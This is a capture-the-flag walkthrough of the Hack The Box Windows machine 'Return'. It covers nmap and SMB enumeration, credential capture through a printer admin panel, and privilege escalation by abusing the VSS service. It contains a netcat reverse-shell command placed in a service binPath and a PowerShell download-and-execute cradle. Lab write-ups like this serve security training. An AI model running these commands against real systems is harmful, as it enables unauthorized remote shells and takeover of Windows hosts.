This is my walk-through of the machine located at:

nmap scan: nmap -T4 -A -oN return.nmap

Starting Nmap 7.92 ( ) at 2021-12-20 15:01 EST
Nmap scan report for
Host is up (0.034s latency).
Not shown: 988 closed tcp ports (reset)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-20 20:26:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 25m06s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-20T20:27:06
|_  start_date: N/A

TRACEROUTE (using port 995/tcp)
1   39.17 ms
2   33.44 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 30.10 seconds

I then went on the IP Address and found this page:

I then ran gobuster on the IP Address: gobuster dir -u -w directory-list-2.3-big.txt -t 60. I ended up with the following, which wasn't very helpful:

I then tried found the nmap command to enumerate ldap: nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' nmap script was taking a while, so I went to the walk-through to see where I had gotten off of track. I found out that I should use enum4linux in order to enumerate for SMB: enum4linux -a I then found this information:

The walk-through mentioned that we should enter our own IP Address in the Server Address section on the website. Using that I got a shell:

The walk-through then mentioned using the evil-winrm tool. I learned that, while I was able to overwrite the password for the svc-printer user, it would be overwritten by its own system. The walk-through pointed out that the password would be what is shown by the output of netcat connection previously:

Looking around, I was able to find the user.txt flag in the Desktop of the svc-printer user:

I am not too familiar with Windows commands, so the walk-through mentioned running the net user svc-printer command:

Again, I had to view the write-up to see where to go from here. From the commands, you are uploading netcat onto the system, and then configuring netcat to be run and connect to your machine:

upload /usr/share/windows-resources/binaries/nc.exe

sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe <YOUR-IP> 1234". After having a netcat listener setup on another tab, I was able to get a connection:

The official walk-through got me to become root, however, I was not able to do anything on the machine. I then found this write-up that helped me setup a proper shell. Here are the commands I used:

Download the Nishang script for Powershell:

Have a netcat listener opened in another teminal window (using rlwrap):
rlwrap nc -lvnp <PORT>

Have a python3 http server online on another teminal window:
sudo python3 -m http.server 80

Upload that to the server with the evil-winrm terminal:
sc.exe config vss binPath="C:\Windows\System32\cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('')"

Restart the executable:
sc.exe stop VSS
sc.exe start VSS

I was then able to get the root.txt file:

Last updated